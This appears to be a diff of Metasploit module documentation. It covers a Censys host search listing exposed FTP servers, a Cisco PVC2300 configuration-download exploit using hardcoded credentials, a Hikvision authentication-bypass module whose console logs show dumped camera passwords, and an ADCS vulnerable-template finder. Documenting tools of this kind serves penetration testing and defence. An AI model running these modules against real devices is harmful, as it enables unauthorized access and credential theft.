+
+```
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted> CERTIFICATES=true
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[*] Certificate for 21/FTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[*] Certificate for 443/HTTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.218 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
 ...

-```
-
-### IPv4 Search
+msf6 auxiliary(gather/censys_search) > services
+Services
+========

-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
-CENSYS_SEARCHTYPE => ipv4
-[*] 197.117.5.36 - 443/https
-[*] 208.118.237.81 - 443/https
-[*] 206.19.237.19 - 443/https
-[*] 54.214.49.70 - 80/http,443/https
-[*] 208.118.237.241 - 443/https
-[*] 162.220.246.141 - 443/https,22/ssh,80/http
-[*] 31.214.157.19 - 443/https,22/ssh
-[*] 52.88.1.225 - 443/https,22/ssh
-[*] 208.118.227.12 - 25/smtp
-[*] 38.107.201.41 - 443/https
-[*] 52.44.56.126 - 80/http,443/https
-[*] 52.54.227.6 - 443/https,80/http
-[*] 23.217.253.242 - 443/https,80/http
-[*] 96.6.3.45 - 80/http,443/https
-[*] 23.6.73.47 - 443/https,80/http
-[*] 23.78.99.243 - 80/http,443/https
-[*] 23.53.51.170 - 80/http,443/https
-[*] 23.62.201.47 - 443/https,80/http
-[*] 2.23.50.157 - 443/https,80/http
-[*] 118.215.191.13 - 80/http,443/https
-[*] 2.19.185.28 - 80/http,443/https
-[*] 2.18.195.99 - 443/https,80/http
-[*] 23.197.196.25 - 443/https,80/http
-[*] 95.100.104.181 - 443/https,80/http
-[*] 2.20.37.130 - 80/http,443/https
-[*] 23.194.237.34 - 443/https,80/http
-[*] 2.17.140.86 - 443/https,80/http
-[*] 64.125.235.5 - 25/smtp
-[*] 208.118.227.32 - 80/http
-[*] 2.21.129.149 - 80/http,443/https
-[*] 2.20.167.33 - 80/http,443/https
-[*] 95.100.139.218 - 80/http,443/https
-[*] 23.38.88.202 - 443/https,80/http
-[*] 2.17.184.80 - 443/https,80/http
-[*] 23.59.119.23 - 80/http,443/https
-[*] 2.16.14.225 - 443/https,80/http
-[*] 104.113.122.33 - 443/https,80/http
-[*] 23.223.44.164 - 80/http,443/https
-[*] 88.221.120.214 - 443/https,80/http
-[*] 23.47.36.145 - 443/https,80/http
-[*] 2.23.21.254 - 80/http,443/https
-[*] 208.118.237.39 - 443/https
-[*] 208.118.237.40 - 443/https
-[*] 208.118.237.41 - 443/https
-[*] 23.54.217.47 - 80/http,443/https
-[*] 96.17.254.188 - 443/https,80/http
-[*] 184.25.129.65 - 443/https,80/http
-[*] 104.121.167.123 - 443/https,80/http
-[*] 104.94.110.63 - 443/https,80/http
-[*] 104.91.11.216 - 80/http,443/https
-[*] 23.38.233.47 - 80/http,443/https
-[*] 52.86.110.89 - 80/http,443/https
-[*] 69.192.73.47 - 443/https,80/http
-[*] 184.86.57.47 - 443/https,80/http
-[*] 104.86.45.180 - 443/https,80/http
-[*] 184.87.72.153 - 80/http,443/https
-[*] 23.66.25.47 - 80/http,443/https
-[*] 23.56.162.76 - 80/http,443/https
-[*] 184.87.133.242 - 443/https,80/http
-[*] 23.55.74.28 - 80/http,443/https
-[*] 23.6.225.84 - 80/http,443/https
-[*] 23.46.133.153 - 443/https,80/http
-[*] 23.10.121.47 - 443/https,80/http
-[*] 104.109.35.169 - 80/http,443/https
-[*] 172.227.101.182 - 80/http,443/https
-[*] 184.27.23.104 - 80/http,443/https
-[*] 23.49.185.47 - 80/http,443/https
-[*] 23.67.172.177 - 80/http,443/https
-[*] 23.62.170.161 - 443/https,80/http
-[*] 23.219.71.35 - 443/https,80/http
-[*] 104.82.94.233 - 443/https,80/http
-[*] 184.26.73.47 - 80/http,443/https
-[*] 104.68.108.237 - 80/http,443/https
-[*] 23.60.39.77 - 80/http,443/https
-[*] 23.66.100.92 - 80/http,443/https
-[*] 23.61.28.182 - 443/https,80/http
-[*] 23.42.116.233 - 80/http,443/https
-[*] 104.105.14.197 - 80/http,443/https
-[*] 104.103.203.240 - 80/http,443/https
-[*] 104.65.57.235 - 80/http,443/https
-[*] 23.41.83.224 - 80/http,443/https
-[*] 184.51.185.47 - 80/http,443/https
-[*] 23.67.231.142 - 80/http,443/https
-[*] 208.118.237.38 - 443/https
-[*] 104.76.25.28 - 80/http,443/https
-[*] 23.196.125.176 - 443/https,80/http
-[*] 23.40.154.224 - 80/http,443/https
-[*] 23.77.33.204 - 443/https,80/http
-[*] 104.88.21.48 - 80/http,443/https
-[*] 173.223.134.47 - 80/http,443/https
-[*] 23.4.98.72 - 80/http,443/https
-[*] 23.44.97.3 - 80/http,443/https
-[*] 23.203.66.142 - 443/https,80/http
-[*] 23.42.216.251 - 443/https,80/http
-[*] 23.42.85.25 - 80/http,443/https
-[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
-[*] 104.83.219.182 - 443/https,80/http
-[*] 184.86.41.47 - 443/https,80/http
-[*] 104.97.72.196 - 443/https,80/http
-[*] 69.192.169.48 - 443/https,80/http
-```
-
-### Websites Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
-CENSYS_SEARCHTYPE => websites
-msf auxiliary(censys_search) > run
-
-[+] rapid7.com - [37743]
-[+] logentries.com - [45346]
-[+] venturefizz.com - [106102]
-[+] gild.com - [116853]
-[+] sectools.org - [122125]
-[+] ericzhang.me - [155622]
-[+] metasploit.com - [156435]
-[+] datapipe.com - [209756]
-[+] routerpwn.com - [317896]
-[+] proxy-base.com - [507954]
-[+] config.fr - [542346]
-[+] winterwyman.com - [629471]
-[+] gogrid.com - [741009]
-[+] wesecure.nl - [997423]
-[*] Auxiliary module execution completed
+host          port   proto  name     state  info
+----          ----   -----  ----     -----  ----
+2.19.184.189  80     tcp    http     open
+2.19.184.189  443    tcp    http     open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  21     tcp    ftp      open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  22     tcp    ssh      open
+2.19.184.214  21     tcp    ftp      open
+2.19.184.216  21     tcp    ftp      open
+2.23.14.108   21     tcp    ftp      open
+2.23.14.163   21     tcp    ftp      open
+2.23.14.163   44174  tcp    unknown  open
+2.23.14.163   449    tcp    unknown  open
+2.23.14.163   515    tcp    unknown  open
+2.23.14.163   4101   tcp    unknown  open
+2.23.14.163   4222   tcp    unknown  open
+2.23.14.163   44104  tcp    unknown  open
+2.23.14.163   44100  tcp    unknown  open
+2.23.14.163   44117  tcp    unknown  open
+2.23.14.163   44133  tcp    unknown  open
+2.23.14.163   44156  tcp    unknown  open
+2.23.14.163   44161  tcp    unknown  open
+2.23.14.163   44162  tcp    unknown  open
+2.23.14.163   44170  tcp    unknown  open
+2.23.14.195   45108  tcp    unknown  open
+2.23.14.195   45111  tcp    unknown  open
+2.23.14.195   45164  tcp    unknown  open
+2.23.14.195   45150  tcp    unknown  open
+2.23.14.195   45149  tcp    unknown  open
+2.23.14.195   21     tcp    ftp      open
+2.23.14.195   45117  tcp    unknown  open
+2.23.14.195   45110  tcp    unknown  open
+2.23.14.199   21     tcp    ftp      open
+2.23.14.201   47113  tcp    unknown  open
+2.23.14.201   21     tcp    ftp      open
+2.23.14.201   47106  tcp    unknown  open
+2.23.14.201   47150  tcp    unknown  open
+2.23.14.209   49100  tcp    unknown  open
+2.23.14.209   21     tcp    ftp      open
+2.23.14.209   49143  tcp    unknown  open
+2.23.14.209   49121  tcp    unknown  open
+2.23.14.209   49152  tcp    unknown  open
+2.23.14.212   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.218   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.235   21     tcp    ftp      open
+2.23.14.243   21     tcp    ftp      open
 ```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file
+containing the admin credentials for the web interface.
+
+The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID
+via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using the `login` action and the hardcoded credentials `L1_admin:L1_51`.
+
+If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml that uses the `downloadConfigurationFile`
+action in an attempt to download the configuration file.
+
+The configuration file, if obtained, will be encdoded using base64 with a non-standard alphabet. In order to decode it,
+the module first translates the encoded configuration file from the default base64 alphabet to the custom alphabet.
+Then the configuration file is decoded using regular base64 and subsequently stored in the `loot` folder.
+
+Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file.
+
+No known solution was made available for this vulnerability and no CVE has been published.
+It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+This module was successfully tested against several Cisco PVC2300 cameras.
+
+## Options
+No non-default options are configured.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/cisco_pvc2300_download_config`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+### Cisco PVC2300
+```
+Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
+[*] Running module against 172.31.31.233
+
+[*] The target may be vulnerable. Obtained sessionID 1122062985
+[+] Successfully downloaded the configuration file
+[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
+[*] Obtained device name PVC2300 POE Video Camera
+[+] Obtained the following admin credentials for the web interface from the configuration file:
+[*] admin username: admin
+[*] admin password: [obfuscated]
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure
+of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
+
+This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
+improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
+as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information
+of the targeted device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+## Verification Steps
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+1. `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `check`
+1. `set PRINT true`
+1. `set ACTION Automatic`
+1. `run`
+1. You should get a full disclosure of all camera information supported by this module.
+
+## Options
+### PRINT
+This option allows you print all information collected to the console during execution except for
+camera snapshots.
+
+## Actions
+### Automatic
+Retrieves all information suported by this module
+### Configuration
+Retrieves the camera hardware and software configuration
+### Credentials
+Retrieves all configured users including the passwords in plain text format and stores them in the database.
+This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
+### Snapshot
+Takes a camera snapshot and stores it as a JPEG file in loot.
+
+All information disclosed is by default stored in loot
+
+## Scenarios
+
+### Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
+
+```
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
+ACTION => Automatic
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
+PRINT => true
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
+
+Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   PRINT    true             no        Print output to console (not applicable for snapshot)
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   Automatic  Dump all information
+
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Running in automatic mode
+[*] Getting the user credentials...
+[*] Credentials for user:admin are added to the database...
+[*] Credentials for user:admln are added to the database...
+[*] User Credentials Information:
+-----------------------------
+Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
+Username:admln | ID:2 | Role:Operator | Password: asdf1234
+
+[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
+[*] Getting the camera hardware and software configuration...
+[*] Camera Device Information:
+--------------------------
+Device name: IP CAMERA
+Device ID: 88
+Device description: IPCamera
+Device manufacturer: Hikvision.China
+Device model: DS-2CD2142FWD-IS
+Device S/N: DS-2CD2142FWD-IS2016HS77777777777
+Device MAC: bc:ad:28:ff:ff:ff
+Device firware version: V5.4.1
+Device firmware release: build 160525
+Device boot version: V1.3.4
+Device boot release: 100316
+Device hardware version: 0x0
+
+Camera Network Information:
+---------------------------
+IP interface: 1
+IP version: v4
+IP assignment: static
+IP address: 192.168.100.180
+IP subnet mask: 255.255.255.0
+Default gateway: 192.168.100.1
+Primary DNS: 8.8.8.8
+
+Camera Storage Information:
+---------------------------
+Storage volume name: HDD1
+Storage volume ID: 1
+Storage volume description: DAS
+Storage device: HDD
+Storage type: internal
+Storage capacity (MB): 30543
+Storage device status: HD_NORMAL
+
+[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
+[*] Taking a camera snapshot...
+[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
+```
+
+## Limitations
+No limitations are identified so far using this module.
@@ -0,0 +1,453 @@
+## Vulnerable Application
+This module allows users to query a LDAP server for vulnerable certificate
+templates and will print these certificates out in a table along with which
+attack they are vulnerable to and the SIDs that can be used to enroll in that
+certificate template.
+
+Additionally the module will also print out a list of known certificate servers
+along with info about which vulnerable certificate templates the certificate server
+allows enrollment in and which SIDs are authorized to use that certificate server to
+perform this enrollment operation.
+
+Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
+
+### Installing ADCS
+1. Install ADCS on either a new or existing domain controller
+1. Open the Server Manager
+1. Select Add roles and features
+1. Select "Active Directory Certificate Services" under the "Server Roles" section
+1. When prompted add all of the features and management tools
+1. On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
+1. Completion the installation and reboot the server
+1. Reopen the Server Manager
+1. Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
+1. Select "Certificate Authority" in the Role Services tab
+1. Keep all of the default settings, noting the "Common name for this CA" value on the "CA Name" tab.
+1. Accept the rest of the default settings and complete the configuration
+
+### Setting up a ESC1 Vulnerable Certificate Template
+1. Open up the run prompt and type in `certsrv`.
+1. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`.
+1. Right click on the folder in the drop down marked `Certificate Templates` and then click `Manage`.
+1. Scroll down to the `User` certificate. Right click on it and select `Duplicate Template`.
+1. From here you can refer to https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md for screenshots.
+1. Select the `General` tab and rename this to something meaningful like `ESC1-Template`, then click the `Apply` button.
+1. In the `Subject Name` tab, select `Supply in the request` and click `Ok` on the security warning that appears.
+1. Click the `Apply` button.
+1. Scroll to the `Extensions` tab.
+1. Under `Application Policies` ensure that `Client Authentication`, `Server Authentication`, `KDC Authentication`, or `Smart Card Logon` is listed.
+1. Click the `Apply` button.
+1. Under the `Security` tab make sure that `Domain Users` group listed and the `Enroll` permissions is marked as allowed for this group.
+1. Under `Issuance Requirements` tab, ensure that under `Require the following for enrollment` that the `CA certificate manager approval` box is unticked, as is the `This number of authorized signatures` box.
+1. Click `Apply` and then `Ok`
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC1-Template` certificate, or whatever you named the ESC1 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC2 Vulnerable Certificate Template
+1. Open up `certsrv`
+1. Scroll down to `Certificate Templates` folder, right click on it and select `Manage`.
+1. Find the `ESC1` certificate template you created earlier and right click on that, then select `Duplicate Template`.
+1. Select the `General` tab, and then name the template `ESC2-Template`. Then click `Apply`.
+1. Go to the `Subject Name` tab and select `Build from this Active Directory Information` and select `Fully distinguished name` under the `Subject Name Format`. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don't think will matter so much so long as the `Supply in the request` option isn't ticked. Then click `Apply`.
+1. Go the to `Extensions` tab and click on `Application Policies`. Then click on `Edit`.
+1. Delete all the existing application policies by clicking on them one by one and clicking the `Remove` button.
+1. Click the `Add` button and select `Any Purpose` from the list that appears. Then click the `OK` button.
+1. Click the `Apply` button, and then `OK`. The certificate should now be created.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC2-Template` certificate, or whatever you named the ESC2 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 1 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template1`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Certificate Request Agent`, then click `OK`.
+1. Click `Apply`.
+1. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` and `This number of authorized signatures` are unchecked.
+1. Click `Apply` if any changes were made or the button is not grey'd out, then click `OK` to create the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template1` certificate, or whatever you named the ESC3 template number 1 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 2 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template2`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Client Authentication`, then click `OK`.
+1. Click `Apply`.
+1. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` is unchecked.
+1. Check the `This number of authorized signatures` checkbox and ensure the value specified is 1, and that the `Policy type required in signature` is set to `Application Policy`, and that the `Application policy` value is `Certificate Request Agent`.
+1. Click `Apply` and then click `OK` to issue the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+## Verification Steps
+1. Do: Start msfconsole
+1. Do: `use auxiliary/gather/ldap_esc_vulnerable_cert_finder`
+1. Do: `set BIND_DN <DOMAIN>\\<USERNAME to log in as>`
+1. Do: `set BIND_PW <PASSWORD FOR USER>`
+1. Do: `set RHOSTS <target IP(s)>`
+1. Optional: `set RPORT <target port>` if target port is non-default.
+1. Optional: `set SSL true` if the target port is SSL enabled.
+1. Do: `run`
+
+## Options
+
+### REPORT_NONENROLLABLE
+If set to `True` then report any certificate templates that are vulnerable but which are not known to be enrollable.
+If set to `False` then skip over these certificate templates and only report on certificate templates
+that are both vulnerable and enrollable.
+
+## Scenarios
+
+### Windows Server 2022 with ADCS
+```
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder 
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
+RHOST => 172.26.104.157
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
+BIND_DN => DAFOREST\Administrator
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
+BIND_PW => theAdmin123
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+
+Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
+
+   Name                  Current Setting         Required  Description
+   ----                  ---------------         --------  -----------
+   BASE_DN                                       no        LDAP base DN if you already have it
+   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
+   BIND_PW               theAdmin123             no        Password for the BIND_DN
+   REPORT_NONENROLLABLE  false                   yes       Report nonenrollable certificate templates
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
+                                                           Metasploit
+   RPORT                 389                     yes       The target port
+   SSL                   false                   no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+[*] Running module against 172.26.104.157
+
+[*] Discovering base DN automatically
+[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
+[*] Template: SubCA
+[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC1-Template
+[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC2-Template
+[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template1
+[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: User
+[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
